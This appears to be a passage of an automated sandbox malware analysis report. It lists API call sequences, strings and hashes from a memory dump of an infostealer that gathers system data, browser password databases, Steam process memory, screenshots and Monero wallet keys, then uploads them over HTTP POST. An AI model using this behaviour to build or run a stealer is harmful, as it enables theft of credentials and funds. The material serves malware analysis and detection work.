                                                                                                                                                                                                                                                                                • String ID: yA$ yA$AV: $Computer Name: $Cores: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt


                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000009,?,00420BBE,?,?,?,C:\ProgramData\,0042150A), ref: 00407E8D
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EAE
                                                                                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 00407EC9
                                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32 ref: 00407F01
                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00407F15
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00407F2C
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 00407F39
                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407F50
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407F6B
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00407F77
                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 00407F85
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000), ref: 00407F99
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00420AE3), ref: 00407FA1
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000), ref: 00407FBC
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 00408052
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040805C
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00408064
                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 0040806E
                                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00408081
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 0040809C
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,_passwords.db), ref: 00407FC4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411D20: GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411D20: HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411D20: wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040814E
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00408158
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040815B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$FileProcesslstrcat$lstrcpy$Free$AllocCloseHandleSleeplstrlen$AllocateCopyCreateDeleteExistsPathReadSizeSystemTimewsprintf
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$_passwords.db
                                                                                                                                                                                                                                                                                • API String ID: 3968722238-2269847733
                                                                                                                                                                                                                                                                                • Opcode ID: a73068b94165eb1fb4997fdb96b272d7ecaa81c9b8b7d476d41781c2edaae806
                                                                                                                                                                                                                                                                                • Instruction ID: e4e39b829918bb4bc11ac9051cc4079098e642cee815a62ce7fe490d7f0511b2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a73068b94165eb1fb4997fdb96b272d7ecaa81c9b8b7d476d41781c2edaae806
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEB1AC31910709ABCB10EFB1CD99AEEB779BF58304F00551AF81267191EF78A985CBA4

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00403003
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                • InternetConnectA.WININET ref: 00402C85
                                                                                                                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00402CC4
                                                                                                                                                                                                                                                                                • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00402CF4
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042150A,?,?,?,?,?,",?,?,build_id), ref: 00402EF9
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00402F16
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 00402F39
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402F86
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402FD0
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00402FE4
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402FF9
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Internet$lstrcpylstrlen$CloseHandle$FileOpenReadlstrcat$ConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                                                • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$hwid
                                                                                                                                                                                                                                                                                • API String ID: 3613725345-1912073456
                                                                                                                                                                                                                                                                                • Opcode ID: a9d75fe2b112728c04049bdae001af630768750935a4b770d8fde99ae311bea8
                                                                                                                                                                                                                                                                                • Instruction ID: 645ce5d239cc6fa04e08d723ed68e7078ac0ea7ecf833b75b29ddf73a14f7ff9
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9d75fe2b112728c04049bdae001af630768750935a4b770d8fde99ae311bea8
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABF1543071012867CB15BBA2999A9FF776A9F84704F40005EF4066B291DFBC5EC6C7E9

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040FE01
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F9B0: strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F9B0: ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F9B0: memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F9B0: VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                                • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FF1E
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040FF84
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,0000012E,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 0040FFC4
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 00410037
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410044
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??3@memset$Processstrlen$MemoryOpenQueryReadVirtual_invalid_parameter_noinfo_noreturnmemcpystrcpy
                                                                                                                                                                                                                                                                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73$@Gc$N0ZWFt$steam.exe
                                                                                                                                                                                                                                                                                • API String ID: 2915318159-3068576885
                                                                                                                                                                                                                                                                                • Opcode ID: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                • Instruction ID: 0ac8410772c06d3c7cd158b0f29ba11351ce6fbe5d6182cbcead23e9eae0fd7c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fce7fecf461071167e0cc146cfa51517afb3279c5333241af36d07da9d6a637a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AA125B16043015BDB20AA24DD84BAFBAD5AF41304F10093FF946976C2E7BD99C8839E
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,http://localhost:,00000011), ref: 004050C1
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,http://localhost:,00000011), ref: 00405123
                                                                                                                                                                                                                                                                                • InternetOpenUrlA.WININET ref: 00405152
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 00405183
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 004051AD
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 004051D3
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 004051E6
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 004051EF
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Internet$??3@CloseFileHandleOpenReadmemcpy$strlen
                                                                                                                                                                                                                                                                                • String ID: "webSocketDebuggerUrl":$"ws://$-$/json$http://localhost:
                                                                                                                                                                                                                                                                                • API String ID: 1783597538-393890490
                                                                                                                                                                                                                                                                                • Opcode ID: dbcf1706423a51fa9e0fb6a036ae722ad1f446616e14a0bdfbc243cc409dfbf2
                                                                                                                                                                                                                                                                                • Instruction ID: 1e9bd75843b12caa15a74e03b6a04fcdd02714e47b13e5b8c883d2d1c503f636
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbcf1706423a51fa9e0fb6a036ae722ad1f446616e14a0bdfbc243cc409dfbf2
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40C1D3706047419BE7249F28C89476FBBE5EF81344F54093EF5829B3D1D778D8448B9A
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                • RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410E34
                                                                                                                                                                                                                                                                                • RegEnumKeyExA.KERNEL32 ref: 00410E65
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?,?,?,?,?,?,?,00421509), ref: 00410F54
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410FB5
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410FBF
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Close$EnumOpenQueryValue$lstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                • String ID: - $%s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                • API String ID: 2273887489-394048932
                                                                                                                                                                                                                                                                                • Opcode ID: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                                • Instruction ID: a9482f3620ee90973302920576edf614ea85895da66572170e0d69f411f645d8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD51A371204314ABD710AF61DC85BAFBBE9EF84744F00881EF48A97251DBB89DC5CB96
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041179A
                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 004117A8
                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004117B5
                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004117E2
                                                                                                                                                                                                                                                                                • malloc.MSVCRT ref: 00411847
                                                                                                                                                                                                                                                                                • StrCmpCW.SHLWAPI(?,image/jpeg), ref: 00411878
                                                                                                                                                                                                                                                                                • GetHGlobalFromStream.COMBASE(?,00000000), ref: 004118E2
                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004118EB
                                                                                                                                                                                                                                                                                • GlobalSize.KERNEL32(00000000), ref: 004118FF
                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00411964
                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00417FAE), ref: 0041197F
                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00411986
                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00411993
                                                                                                                                                                                                                                                                                • CloseWindow.USER32(?), ref: 0041199A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: GlobalObject$Window$DeleteSelectStream$CloseCreateDesktopFromLockRectReleaseSizemalloc
                                                                                                                                                                                                                                                                                • String ID: image/jpeg$screenshot.jpg
                                                                                                                                                                                                                                                                                • API String ID: 290954413-3715547155
                                                                                                                                                                                                                                                                                • Opcode ID: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                • Instruction ID: ee18476c3b49a6e7ea655472561b7fd097213a4b83d20557ae7d52cec962e0ac
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6713D71900619EFDF04AFA0DD89AEEBB79FF08304F005019FA16A7161DB759985CBE4
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040149A
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 004014B7
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004014C5
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004014DE
                                                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004014F9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401505
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00401511
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,.keys), ref: 00401526
                                                                                                                                                                                                                                                                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401611
                                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,000000FF), ref: 004016DA
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileHeap$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcatlstrcpylstrlenmemset
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$SOFTWARE\monero-project\monero-core$Wallets$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                                • API String ID: 288866737-733413667
                                                                                                                                                                                                                                                                                • Opcode ID: 2285756484b5302f54d26c5f8b61bba89344935ed41bf6c8ffe7ed6eb375a518
                                                                                                                                                                                                                                                                                • Instruction ID: 0f5ab2e365d18679f7850bd259ae8de3c372ef4a79097f50b908b3179d6c5dbc
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2285756484b5302f54d26c5f8b61bba89344935ed41bf6c8ffe7ed6eb375a518
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70717331A10218ABCB14EFA1DD969EE7779AF48704F00405EF9016B152DBBCAEC5CBA5
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                • String ID: CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 11
                                                                                                                                                                                                                                                                                • API String ID: 3466090806-605346811
                                                                                                                                                                                                                                                                                • Opcode ID: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
                                                                                                                                                                                                                                                                                • Instruction ID: 4649c964c2ac6d4717e2a874ab9f529b914844d538cc1ef61ec3e528cde88b08
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
